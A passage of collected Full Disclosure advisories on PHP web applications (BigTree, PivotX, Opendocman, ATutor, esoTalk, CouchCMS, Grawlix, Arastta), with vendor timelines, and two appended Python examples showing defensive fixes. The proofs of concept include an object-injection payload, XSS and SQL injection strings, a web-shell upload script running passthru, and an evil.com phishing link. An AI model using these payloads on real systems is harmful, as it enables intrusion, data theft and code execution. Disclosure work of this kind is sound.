In addition to the object injection, BigTree also has a function called cleanFile which is supposed to prevent directory traversal, but which can be bypassed. The function is not currently used by BigTree itself, but may be used by plugins.

3. Object Injection

Description

CVSS: Low 3.5 AV:N/AC:M/Au:S/C:N/I:P/A:N

BigTree passes unvalidated user input to unserialize, leading to PHP object injection. The vulnerability is in the backend, so a user account with the role developer or admin is required. A successful exploitation may for example lead to an admin editing settings they are not authorized to edit. In BigTree, the admin role is less privileged than the developer role. For example, an admin can only edit a subset of the settings.

The impact of the vulnerability is currently small, as BigTree does not implement __wakeup in any classes, none of the classes implement the iterator interface, and __destruct is only implemented in a limited number of classes, and only one of the cases seems relevant to security: The destructor of the BigTreeCMSBase class updates all settings, without again validating if the user is allowed to update the setting and without re-validating the value of a setting.

This may for example lead to persistent XSS - the admin does not have the right to post scripts, as this would weaken the distinction between admins and developers - by changing the colophon setting. An admin has the right to edit this setting, but the input is HTML encoded before putting it in the database. By bypassing this encoding, a malicious admin can inject scripts.

It should be noted that custom modules may contain classes that lead to a bigger security impact of this vulnerability.

Proof of Concept

The attack can be achieved in a browser by visiting the following URL and clicking on save:

http://localhost/BigTree-CMS/site/index.php/admin/trees/edit/2/?view_data=[INJECTED OBJECT]

A payload to update the setting "bigtree-internal-security-policy" may for example be:

a:2:{s:7:"bigtree";O:14:"BigTreeCMSBase":2:{s:16:"AutoSaveSettings";a:1:{s:32:"bigtree-internal-security-policy";a:1:{s:3:"foo";s:3:"bar";}}s:15:"ModuleClassList";a:2:{s:9:"DemoTrees";s:5:"trees";s:10:"DemoQuotes";s:6:"quotes";}}s:4:"view";s:6:"foobar";}

The actual request is a POST request to /BigTree-CMS/site/index.php/admin/trees/edit/process/, where the _bigtree_return_view_data field contains the base64 encoded payload.

Code

/process.php

$return_view_data = unserialize(base64_decode($_POST["_bigtree_return_view_data"]));
if (!$bigtree["form"]["return_view"] || $bigtree["form"]["return_view"] == $return_view_data["view"]) {
    $redirect_append = array();
    unset($return_view_data["view"]); // We don't need the view passed back.
    foreach ($return_view_data as $key => $val) {
        $redirect_append[] = "$key=".urlencode($val);
    }
    $redirect_append = "?".implode("&",$redirect_append);
}

/cms.php

function __destruct() {
    foreach ($this->AutoSaveSettings as $id => $obj) {
        if (is_object($obj)) {
            BigTreeAdmin::updateSettingValue($id,get_object_vars($obj));
        } else {
            BigTreeAdmin::updateSettingValue($id,$obj);
        }
    }
}

4. Improper Filename Sanitation

Description

The function cleanFile is supposed to prevent directory traversal, but currently it does not fulfill its task, as an attacker can easily bypass the filter via //. The function is currently not used for any sensitive tasks, but it may be used by extensions or in the future.

Code

/*
    Function: cleanFile
        Makes sure that a file path doesn't contain abusive characters (i.e. ../)

    Parameters:
        file - A file name

    Returns:
        Cleaned up string.
*/

static function cleanFile($file) {
    return str_replace("../","",$file);
}

5. Solution

To mitigate this issue please upgrade at least to version 4.2.9:
https://www.bigtreecms.org/download/
Please note that a newer version might already be available.
[FD] PivotX 2.3.11: Code Execution
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: PivotX 2.3.11
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://pivotx.net/
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 01/20/2016
Disclosed to public: 03/15/2016
Release mode: Full Disclosure
CVE: n/a

Credits
Tim Coen of Curesec GmbH

2. Overview

PivotX is a CMS for blogging written in PHP. In version 2.3.11, it is vulnerable to code execution by authenticated users because it does not check the extension of files when renaming them.

3. Details

Description

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

The file upload functionality checks file extensions when uploading files to prevent the uploading of malicious files such as PHP files. However, the rename function does not check the extension of the new filename, leading to code execution. An account in the advanced users, admins, or superadmins role is required to upload files.

Proof of Concept

1. Upload an image file containing PHP code with a valid extension such as png
2. Rename it so it has a PHP extension:
   http://localhost/pivotx_latest/pivotx/index.php?page=media&file=imageshell.png&pivotxsession=ovyyn4ob2jc5ym92&answer=shell.php

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

01/20/2016 Informed Vendor about Issue
01/29/2016 Vendor replies, PivotX is not maintained anymore
03/15/2016 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/PivotX-2311-Code-Execution-153.html
[FD] Opendocman 1.3.4: HTML Injection
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Opendocman 1.3.4
Fixed in: 1.3.5
Fixed Version Link: http://www.opendocman.com/free-download/
Vendor Website: http://www.opendocman.com/
Vulnerability Type: HTML Injection
Remote Exploitable: Yes
Reported to vendor: 11/21/2015
Disclosed to public: 02/01/2016
Release mode: Coordinated Release
CVE: n/a

Credits
Tim Coen of Curesec GmbH

2. Overview

CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

To defend against XSS and similar attacks, opendocman depends on a function that filters all input to remove dangerous tags and attributes. The filter does filter out all simple approaches to XSS, but it still leaves an attacker with large control over the look and functionality of the website. This can lead to phishing attacks, privilege escalation, defacement, and may lead to XSS with older browsers. There are likely other possibilities for attackers.

It is recommended to HTML-encode user input before echoing it to mitigate these issues, instead of relying on input filtering.

These issues are present across the application and are reflected as well as persistent, for example via the profile or comments.

3. Proof of Concept

Privilege Escalation

A registered user can exploit this issue in combination with social engineering to gain admin rights:

- Change any profile field, such as last name, to: Smith">http://localhost/opendocman-1.3.4/search.php/";>

Phishing & Defacement

Attacker-controlled elements can be shown in places where a user would only expect application-controlled data, not user data, which can be used in phishing attacks or to deface the website.

A simple example would be:

http://localhost/opendocman-1.3.4/search.php/";>http://evil.com"; style="background: red; color: white">Security Alert: Please upgrade to the latest version here!http://localhost/opendocman-1.3.4/add.php

The same is possible when updating a user profile here:

http://localhost/opendocman-1.3.4//profile.php

It should be noted that by default, the registration is not open, but there is an option to open registration for anyone.

4. Code

The problem exists across the application. A quick search reveals at least these code snippets which are likely open to reflected attacks. Further parameters are likely vulnerable as well. Additionally, all user input that is persisted seems to be affected as well.

check-out.php:';
category.php:
rejects.php:echo '';
rejects.php:echo '';
search.php:

http://www.opendocman.com/free-download/
Please note that a newer version might already be available.

6. Report Timeline

11/21/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of disclosure date
12/19/2015 Vendor sends fix for different issue for verification
01/13/2016 Confirmed fix
01/20/2016 Vendor requests more time to fix XSS issues
01/31/2016 Vendor releases fix
02/01/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/Opendocman-134-HTML-Injection-151.html
[FD] Opendocman 1.3.4: CSRF
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Opendocman 1.3.4
Fixed in: 1.3.5
Fixed Version Link: http://www.opendocman.com/free-download/
Vendor Website: http://www.opendocman.com/
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 11/21/2015
Disclosed to public: 02/01/2016
Release mode: Coordinated Release
CVE: n/a

Credits
Tim Coen of Curesec GmbH

2. Overview

CVSS Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

Description

Opendocman does not have CSRF protection, which means that an attacker can perform actions for an admin, if the admin visits an attacker controlled website while logged in.

3. Proof of Concept

Add new Admin User:

http://localhost/opendocman-1.3.4/user.php"; method="POST" enctype="multipart/form-data">

4. Solution

To mitigate this issue please upgrade at least to version 1.3.5:
http://www.opendocman.com/free-download/
Please note that a newer version might already be available.

5. Report Timeline

11/21/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of disclosure date
12/19/2015 Vendor sends fix for CSRF for verification
01/13/2016 Confirmed CSRF fix
01/20/2016 Vendor requests more time to fix other issues in same version
01/31/2016 Vendor releases fix
02/01/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/Opendocman-134-CSRF-150.html
[FD] Atutor 2.2: XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Atutor 2.2
Fixed in: partly in ATutor 2.2.1-RC1, complete in 2.2.1
Fixed Version Link: http://www.atutor.ca/atutor/download.php
Vendor Website: http://www.atutor.ca/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 02/01/2016
Release mode: Coordinated Release
CVE: n/a

Credits
Tim Coen of Curesec GmbH

2. Overview

Atutor is a learning management system (LMS) written in PHP. In version 2.2, it is vulnerable to multiple reflected and persistent XSS attacks. The vulnerabilities can lead to the stealing of cookies, injection of keyloggers, or the bypassing of CSRF protection. If the victim is an admin, a successful exploitation can lead to code execution via the theme uploader, and if the victim is an instructor, this can lead to code execution via a file upload vulnerability in the same version of Atutor.

3. Details

XSS 1: Reflected XSS - Calendar

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description:

The calendar_next parameter of the calendar is vulnerable to XSS. This issue has been fixed in ATutor 2.2.1-RC1.

Proof of Concept:

http://localhost/ATutor/mods/_standard/calendar/getlanguage.php?token=calendar_next
[FD] esoTalk 1.0.0g4: XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: esoTalk 1.0.0g4
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: t...@esotalk.org
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 12/21/2015
Release mode: Full Disclosure
CVE: n/a

Credits
Tim Coen of Curesec GmbH

2. Overview

CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

esoTalk is a light-weight forum software written in PHP. In version 1.0.0g4 and possibly prior versions, there is a reflected XSS vulnerability in the search because a given URL is echoed unencoded in multiple places. Successful exploitation may lead to the injection of JavaScript keyloggers, the stealing of cookies, or the bypassing of CSRF protection.

3. Proof of Concept

http://localhost/esoTalk-1.0.0g4/conversations/a'">?search=test

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

11/17/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/21/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/esoTalk-100g4-XSS-124.html
[FD] CouchCMS 1.4.5: Code Execution
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: CouchCMS 1.4.5
Fixed in: 1.4.7
Fixed Version Link: http://www.couchcms.com/products/
Vendor Website: http://www.couchcms.com/
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 12/21/2015
Release mode: Coordinated Release
CVE: n/a

Credits
Tim Coen of Curesec GmbH

2. Overview

CVSS High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C

Description

When uploading a file, the file extension is checked against a blacklist. This blacklist misses at the least pht, which is executed by most default Apache configurations. The uploaded file must be a valid image file, but an attacker can bypass this restriction. Admin credentials are required to upload files.

A htaccess file forbids the execution of PHP code in uploaded files, but some servers are configured to not read htaccess files, for example for performance reasons. Apache for example ignores htaccess files by default since version 2.3.9.

3. Proof of Concept

POST /CouchCMS-1.4.5/couch/includes/kcfinder/browse.php?type=image&lng=en&act=upload&nonce=1abb096565d868f94f727f600e8c4f61 HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---18851501621445926637695954351
Content-Length: 529

-18851501621445926637695954351
Content-Disposition: form-data; name="upload[]"; filename="imageshell.pht"
Content-Type: application/octet-stream

[base64: iVBORw0KGgoNSUhEUgAAACAgCAIAAAD8GO2jCXBIWXMAAA7EAAAOxAGVKw4bYElEQVRIiWNcPD89JF9HRVRbMF0oJF9QT1NUWzFdKTs/PliAgYHBc143k/yPi9t+X9N9qif38ePJv1/vBnyyMDBj2bln/dk9G84yjIJRMApGwSgYBaNgFIyCUTAKhg0AAIGyGwIHeA0MAElFTkSuQmCC]

The shellcode used can be found here:
https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

4. Solution

To mitigate this issue please upgrade at least to version 1.4.7:
http://www.couchcms.com/products/
Please note that a newer version might already be available.

5. Report Timeline

11/17/2015 Informed Vendor about Issue
11/18/2015 Vendor sends fixes for confirmation
11/20/2015 Verified fixes
11/24/2015 Vendor releases fix
12/21/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/CouchCMS-145-Code-Execution-125.html
[FD] Grawlix 1.0.3: CSRF
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Grawlix 1.0.3
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://www.getgrawlix.com/
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 12/21/2015
Release mode: Full Disclosure
CVE: n/a

Credits
Tim Coen of Curesec GmbH

2. Overview

CVSS Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

Description

Grawlix is a CMS for publishing comics, which is written in PHP. In version 1.0.3, it does not have CSRF protection, which means that an attacker can perform actions for a victim, if the victim visits an attacker controlled site while logged in. An attacker can for example change the password of an existing admin account, which may in turn lead to code execution via a different vulnerability in the admin area.

3. Proof of Concept

Change admin password:

http://localhost/grawlix-1.0.3/grawlix-1.0.3/_admin/user.config.php"; method="POST">

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

11/17/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/21/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/Grawlix-103-CSRF-128.html
[FD] CouchCMS 1.4.5: XSS & Open Redirect
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: CouchCMS 1.4.5
Fixed in: 1.4.7
Fixed Version Link: http://www.couchcms.com/products/
Vendor Website: http://www.couchcms.com/
Vulnerability Type: XSS & Open Redirect
Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 12/21/2015
Release mode: Coordinated Release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description
CouchCMS 1.4.5 contains two reflected XSS and one open redirect vulnerability. Successful exploitation may lead to the injection of JavaScript keyloggers, the stealing of cookies, or the bypassing of CSRF protection.

3. Details

XSS 1

When displaying a post, the name of any additional GET parameters is echoed unencoded, leading to XSS.

Proof of Concept:
http://localhost/CouchCMS-1.4.5/blog.php?p=5&foo";>alert(2)bar=1

Code:
    function getPaginationString( $page = 1, $totalitems, $limit = 15, $adjacents = 1, $targetpage = "/", $pagestring = "?page=", $prev_text, $next_text, $simple ){
        [...]
        $pagination .= "$counter";
        [...]
        $pagination .= "$counter";
        [...]
        $pagination .= "$lpm1";
        $pagination .= "$lastpage";
        [... (all $targetpage . $pagestring are affected) ...]
    }

XSS 2

When displaying comments, the name of any additional GET parameters is echoed unencoded, leading to XSS.

Proof of Concept:
http://localhost/CouchCMS-1.4.5/couch/?o=comments&foo";>alert(1)bar=1

Code:
/couch/edit-comments.php
    href="">t('all'); ?> |
    href="&status=0">t('unapproved'); ?> |
    href="&status=1">t('approved'); ?>
    (of '.$page_title.')'; } ?>
    [...]
    | t('view'); ?>
    | t('edit'); ?>
    | t('delete'); ?>

Open Redirect

The filter which checks if a user supplied redirect value leads to external pages can be bypassed by an attacker.

Proof of Concept (Only works for logged in victims or after login):
http://localhost/CouchCMS-1.4.5/couch/login.php?redirect=//google.com

Code:
/couch/auth/auth.php
    function redirect( $dest ){
        global $FUNCS, $DB;

        // sanity checks
        $dest = $FUNCS->sanitize_url( trim($dest) );
        if( !strlen($dest) ){
            $dest = ( $this->user->access_level < K_ACCESS_LEVEL_ADMIN ) ? K_SITE_URL : K_ADMIN_URL . K_ADMIN_PAGE;
        }
        elseif( strpos(strtolower($dest), 'http')===0 ){
            if( strpos($dest, K_SITE_URL)!==0 ){ // we don't allow redirects external to our site
                $dest = K_SITE_URL;
            }
        }

        $DB->commit( 1 );
        header( "Location: ".$dest );
        die();
    }

4. Solution

To mitigate this issue please upgrade at least to version 1.4.7:
http://www.couchcms.com/products/

Please note that a newer version might already be available.

5. Report Timeline

11/17/2015 Informed Vendor about Issue
11/18/2015 Vendor sends fixes for confirmation
11/20/2015 Verified fixes
11/24/2015 Vendor releases fix
12/21/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/CouchCMS-145-XSS-amp-Open-Redirect-126.html
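The redirect filter above only fires when the value starts with "http", so a protocol-relative destination such as //google.com is passed straight into the Location header. The following is an added example, not code from the advisory or from CouchCMS (which is PHP), showing how a redirect check that resolves the value first and then compares the parsed scheme, host and base path closes that gap. SITE_URL is an assumed stand-in for the K_SITE_URL constant in the advisory; the function names are this example's own.

```python
from urllib.parse import urljoin, urlsplit

# Constructed for this example: the base URL the advisory's K_SITE_URL constant would hold.
SITE_URL = "http://localhost/CouchCMS-1.4.5/"


def is_local_redirect(dest: str, site_url: str = SITE_URL) -> bool:
    """True only if `dest` resolves to a URL on the site's own scheme, host and base path.

    The prefix test from the advisory (strpos($dest, 'http') === 0) never sees a
    protocol-relative value such as //google.com, which the browser completes to
    http://google.com. Resolving first and comparing parsed components also covers
    userinfo tricks (http://localhost@evil.com/) and `..` segments.
    """
    if not dest or any(c in dest for c in "\r\n\x00"):
        return False  # header injection / NUL characters
    if "\\" in dest:
        return False  # browsers treat /\evil.com and \\evil.com as authority separators
    site = urlsplit(site_url)
    target = urlsplit(urljoin(site_url, dest))  # resolves relative paths and `..`
    if target.scheme.lower() != site.scheme.lower():
        return False  # also rejects javascript: and other non-http schemes
    if target.netloc.lower() != site.netloc.lower():
        return False  # netloc keeps userinfo and port, so both are compared too
    return target.path.startswith(site.path)


def safe_redirect_target(dest: str, site_url: str = SITE_URL) -> str:
    """Value for the Location header: the resolved destination if local, else the site root."""
    return urljoin(site_url, dest) if is_local_redirect(dest, site_url) else site_url
```

The comparison is done on the parsed components rather than on the string prefix, so a site URL of http://localhost/CouchCMS-1.4.5/ does not accept http://localhost.evil.com/ or http://localhost@evil.com/ either.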
[FD] Grawlix 1.0.3: XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Grawlix 1.0.3
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://www.getgrawlix.com/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 12/21/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description
Grawlix is a CMS for publishing comics, which is written in PHP. In version 1.0.3 and possibly prior versions, it contains multiple reflected XSS vulnerabilities. Successful exploitation may lead to the injection of JavaScript keyloggers, the stealing of cookies, or the bypassing of CSRF protection.

3. Details

XSS 1

When searching for a book in the admin area, the keyword parameter is echoed unencoded inside the value attribute of an input tag, leading to XSS.

Proof of Concept:
http://localhost/grawlix-1.0.3/_admin/book.view.php?keyword="; autofocus onfocus="alert(1)

Code:
_admin/book.view.php

XSS 2

The slot.label-set.ajax.php script echoes all GET parameters unencoded, leading to XSS.

Proof of Concept:
http://localhost/grawlix-1.0.3/_admin/slot.label-set.ajax.php?x=alert(1)

Code:
_admin/slot.label-set.ajax.php
    echo '$_GET|';print_r($_GET);echo '|';

XSS 3

The edit_id parameter of the site.nav-edit.ajax.php script is vulnerable to XSS.

Proof of Concept:
http://localhost/grawlix-1.0.3/_admin/site.nav-edit.ajax.php?edit_id=";>alert(1)

Code:
_admin/site.nav-edit.ajax.php
    $edit_id = $_GET['edit_id'];
    [...]
    $modal->value($edit_id);

_admin/lib/GrlxForm.php
    $this->value ? $value = ' value="'.$this->value.'"' : null;

XSS 4

When viewing the book overview, the start_sort_order parameter is vulnerable to XSS.

Proof of Concept:
http://localhost/grawlix-1.0.3/_admin/book.view.php?delete_page_id=1&start_sort_order="; onmouseover="alert(1)

Code:
_admin/book.view.php
    $delete_link->query("delete_page_id=$val[id]&start_sort_order=$start_sort_order");

XSS 5 (limited)

In two scripts, the page_id value is put into a hidden input element without encoding quotes. It may be possible to execute JavaScript via a style element in older browsers.

Proof of Concept:
http://localhost/grawlix-1.0.3/_admin/sttc.xml-edit.php?msg=created&page_id="; style="STYLE
http://localhost/grawlix-1.0.3/_admin/book.page-edit.php?page_id="; style="STYLE

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

11/17/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/21/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/Grawlix-103-XSS-129.html
[FD] Grawlix 1.0.3: Code Execution
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Grawlix 1.0.3
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://www.getgrawlix.com/
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 12/21/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description
Grawlix is a CMS for publishing comics, which is written in PHP. When uploading an image icon for a link, neither the file type nor the file extension are checked, leading to code execution.

It should be noted that admin credentials are required to upload an icon, and that because of a bug when uploading icons, the upload only works if Grawlix is installed in the root directory.

3. Proof of Concept

    function submitRequest() {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://localhost/_admin/site.link-list.php", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---172718417319970434061213874184");
        xhr.withCredentials = true;
        // each part boundary is "--" followed by the boundary string from the Content-Type header
        var body = "-----172718417319970434061213874184\r\n" +
            "Content-Disposition: form-data; name=\"input[title]\"\r\n" +
            "\r\n" +
            "Site name\r\n" +
            "-----172718417319970434061213874184\r\n" +
            "Content-Disposition: form-data; name=\"input[url]\"\r\n" +
            "\r\n" +
            "http://google.com\r\n" +
            "-----172718417319970434061213874184\r\n" +
            "Content-Disposition: form-data; name=\"icon_file\"; filename=\"test.php\"\r\n" +
            "Content-Type: application/x-php\r\n" +
            "\r\n" +
            "\x3c?php \n" +
            "passthru($_GET[\'x\']);\n" +
            "\r\n" +
            "-----172718417319970434061213874184\r\n" +
            "Content-Disposition: form-data; name=\"submit\"\r\n" +
            "\r\n" +
            "save\r\n" +
            "-----172718417319970434061213874184--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
            aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
    }

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

11/17/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/21/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/Grawlix-103-Code-Execution-127.html
[FD] Arastta 1.1.5: SQL Injection
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Arastta 1.1.5
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://arastta.org/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 11/21/2015
Disclosed to public: 12/21/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

Arastta is an eCommerce software written in PHP. In version 1.1.5, it is vulnerable to two SQL injection vulnerabilities, one normal injection when searching for products via tags, and one blind injection via the language setting. Both of them require a user with special privileges to trigger.

3. SQL Injection 1

CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description
There is an SQL Injection when retrieving products. Currently, only the "filter" variable is vulnerable. Note that the "tag_name" variable would also be vulnerable to SQL injection, if there wasn't a filter that forbade single quotes in the URL. As defense in depth, it might be a good idea to sanitize that value here as well.

Note that an account with the right "Catalog -> Filters" is needed to exploit this issue.

Proof of Concept

POST /Arastta/admin/index.php?route=catalog/product/autocomplete&token=3d6cfa8f9f602a4f47e0dfbdb989a469&filter_name=a&tag_name= HTTP/1.1

tag_text[][value]=abc') union all select password from gv4_user -- -

Code

/admin/model/catalog/product.php
    public function getTags($tag_name, $filter_tags = null) {
        [...]
        $query = $this->db->query("SELECT DISTINCT(tag) FROM `" . DB_PREFIX . "product_description` WHERE `tag` LIKE '%" . $tag_name . "%'" . $filter);

/admin/controller/catalog/product.php
    public function autocomplete() {
        [...]
        if (isset($this->request->get['tag_name'])) {
            $this->load->model('catalog/product');

            if (isset($this->request->get['tag_name'])) {
                $tag_name = $this->request->get['tag_name'];
            } else {
                $tag_name = '';
            }

            $filter = null;
            if(isset($this->request->post['tag_text'])) {
                $filter = $this->request->post['tag_text'];
            }

            $results = $this->model_catalog_product->getTags($tag_name, $filter);

            foreach ($results as $result) {
                $json[] = array(
                    'tag'    => $result,
                    'tag_id' => $result
                );
            }
        }

4. SQL Injection 2

CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description
There is a second order timing based SQL injection when choosing the language setting. An admin account with the right "Setting -> Setting" is needed to exploit this issue. Alternatively, a user with the right "Localisation -> Languages" can inject a payload as well. However, a user with the right "Setting -> Setting" is still needed to choose the malicious language to trigger the payload.

Proof of Concept

Visit the setting page:
http://localhost/Arastta/admin/index.php?route=setting/setting

For the config_language and config_admin_language parameters use:
en' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(5000,ENCODE('MSG','by 5 seconds')),null) -- -

Visiting any site will trigger the injected code.

Code

/Arastta/system/library/utility.php
    public function getDefaultLanguage(){
        if (!is_object($this->config)) {
            return;
        }

        $store_id = $this->config->get('config_store_id');

        if (Client::isAdmin()){
            $sql = "SELECT * FROM " . DB_PREFIX . "setting WHERE `key` = 'config_admin_language' AND `store_id` = '" . $store_id . "'";
        } else {
            $sql = "SELECT * FROM " . DB_PREFIX . "setting WHERE `key` = 'config_language' AND `store_id` = '" . $store_id . "'";
        }

        $query = $this->db->query($sql);
        $code = $query->row['value'];

        $language = $this->db->query("SELECT * FROM " . DB_PREFIX . "language WHERE `code` = '" . $code . "'");

        return $language->row;
    }

5. Solution

This issue was not fixed by the vendor.

6. Report Timeline

11/21/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/17/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/Arastta-115-SQL-Injection-131.html
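The second injection above is second-order: the language code is written to the setting table on one request and concatenated into a query on every later request, so filtering the HTTP input (the single-quote filter the advisory mentions for tag_name) does not reach it. The following is an added example, not code from the advisory or from Arastta (which is PHP), that rebuilds the getDefaultLanguage() lookup over an in-memory SQLite fixture once with string concatenation, as in the advisory, and once with bound parameters, and shows that only the parameterised version treats the stored value as a literal. The tables, rows and the tautology used in the test are constructed for this example; the gv4_ prefix is the one in the advisory's proof of concept.

```python
import sqlite3

# DB_PREFIX as it appears in the advisory's proof of concept (gv4_user).
DB_PREFIX = "gv4_"


def make_db() -> sqlite3.Connection:
    """Constructed in-memory fixture with the two tables getDefaultLanguage() touches."""
    con = sqlite3.connect(":memory:")
    con.execute(f"CREATE TABLE {DB_PREFIX}setting (`key` TEXT, store_id INTEGER, value TEXT)")
    con.execute(f"CREATE TABLE {DB_PREFIX}language (code TEXT, name TEXT)")
    con.executemany(f"INSERT INTO {DB_PREFIX}language VALUES (?, ?)",
                    [("en", "English"), ("de", "German")])
    return con


def store_admin_language(con: sqlite3.Connection, store_id: int, code: str) -> None:
    """First-order write: the settings page stores whatever string the admin submitted.

    Written with a bound parameter, so the value lands in the table unchanged; the
    flaw described in the advisory is in the later read, not in this write.
    """
    con.execute(f"INSERT INTO {DB_PREFIX}setting VALUES (?, ?, ?)",
                ("config_admin_language", store_id, code))


def default_language_unsafe(con: sqlite3.Connection, store_id: int) -> list:
    """Mirrors the advisory's getDefaultLanguage(): the stored code is concatenated into SQL."""
    sql = (f"SELECT value FROM {DB_PREFIX}setting "
           f"WHERE `key` = 'config_admin_language' AND store_id = '{store_id}'")
    code = con.execute(sql).fetchone()[0]
    # Second-order injection point: `code` came from the database, not from the
    # request, so input filtering at the HTTP layer never sees this query.
    return con.execute(
        f"SELECT code, name FROM {DB_PREFIX}language WHERE code = '{code}'").fetchall()


def default_language_safe(con: sqlite3.Connection, store_id: int) -> list:
    """Same lookup with bound parameters: the stored value can only ever be a literal code."""
    code = con.execute(
        f"SELECT value FROM {DB_PREFIX}setting WHERE `key` = ? AND store_id = ?",
        ("config_admin_language", store_id)).fetchone()[0]
    return con.execute(
        f"SELECT code, name FROM {DB_PREFIX}language WHERE code = ?", (code,)).fetchall()
```

With a normal code such as "de" both functions return the same row; with a stored value that contains a quote, the concatenating version's WHERE clause changes meaning while the parameterised version simply finds no language. Binding parameters at the second query is the fix; escaping on the way in is not enough, because the value is re-used later without its original context.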
[FD] Arastta 1.1.5: XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Arastta 1.1.5
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://arastta.org/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 11/21/2015
Disclosed to public: 12/21/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description
Arastta is an eCommerce software written in PHP. In version 1.1.5, a given URL is echoed unencoded, leading to XSS. This can be used to inject JavaScript keyloggers or to bypass CSRF protection. If the victim is an admin with the right "Tool -> File Manager", this can lead to code execution via the file manager.

3. Proof of Concept

http://localhost/Arastta/index.php/desktops/pc";>alert(1)?sort=pd.name&order=DESC

4. Code

/catalog/view/theme/default/template/common/header.tpl

5. Solution

This issue was not fixed by the vendor.

6. Report Timeline

11/21/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
